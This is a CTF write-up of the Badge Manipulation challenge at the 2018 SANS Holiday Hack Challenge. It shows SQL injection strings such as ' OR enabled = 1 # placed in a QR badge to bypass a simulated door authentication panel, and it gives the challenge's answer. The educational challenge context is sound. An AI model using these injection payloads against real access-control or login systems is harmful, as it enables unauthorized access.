Salaheldin

March 14, 2019

Badge Manipulation

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup

๐Ÿ“ 2nd floor from Pepper Minstix go to the end of the corridor then left until you reach the door on your right.


solution-icon.png

1- As OWASP website on how to bypass panels , Letโ€™s try some code variations :

or 1-- -โ€™

2- Letโ€™s create the QR barcode badge :

12-img-1.jpg

3- Go to the authentication panel then click usb port and upload the created qr png file :

> if you get this error message โ€œresource_id not set in cookieโ€ , try to login from different browser where third party cookies enabled.

After you upload the badge png file , you will get this error message :

12-img-2.jpg

To view the full message using the following method :

  • In Firefox : Right click > inspect element > network tab > reload button
  • Then re-upload the qr file again
  • Select last loaded item > Select response from right panel
12-img-3.jpg

EXCEPTION AT (LINE 96 โ€œuser_info = query(โ€œSELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = โ€˜{}โ€™ LIMIT 1โ€.format(uid))โ€): (1064, uโ€You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near โ€˜โ€™or 1-- -โ€™โ€™ LIMIT 1โ€™ at line 1โ€)

4- This error message give us the query used to validate the badge :

SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = โ€˜{}โ€™ LIMIT 1

Where uid is our badge code and the interesting enabled, authorized variables.

5- Letโ€™s reshape our code and regenerate our qr badge :

โ€˜ OR 1 = 1 #

We will use or to select authorized accounts regardless the uid ,also will use # at the end to Inline comment the rest of the code because we need to ignores formatting of uid .

As you can see will get the following error message :

Authorized User Account Has Been Disabled!

12-img-4.jpg

6- Letโ€™s reshape our code again and regenerate our qr badge :

โ€˜ OR enabled = 1 #

We will use or to select enabled accounts regardless the uid or authorized accounts ,

Also will try enabled with 1 then true to test the values .

12-img-5.jpg

Successfully opened the door and also got the access control number :

User Access Granted - Control number 198807


๐Ÿ“Ÿ Go to your Badge > Objectives > Enter 19880715